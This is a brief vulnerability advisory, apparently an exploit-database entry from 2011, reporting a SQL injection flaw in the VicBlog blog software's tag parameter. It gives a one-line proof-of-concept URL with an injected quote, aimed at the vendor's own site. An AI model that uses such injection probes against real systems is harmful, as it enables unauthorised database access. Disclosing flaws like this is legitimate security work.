VicBlog suffers from a remote SQL injection vulnerability.
0f4a06b231d5fd6de81b727dc6e18a4b8725910b928aa3274480e8422e3ca978
# Exploit Title: VicBlog SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.vicdesigns.com.au
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Vulnerable Page:
index.php
Example:
index.php?page=posts&tag=<SQL Injection Code>
Exploit:
index.php/1'
POC:
http://www.vicdesigns.com.au/vicblog/index.php?page=posts&tag=1%27
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr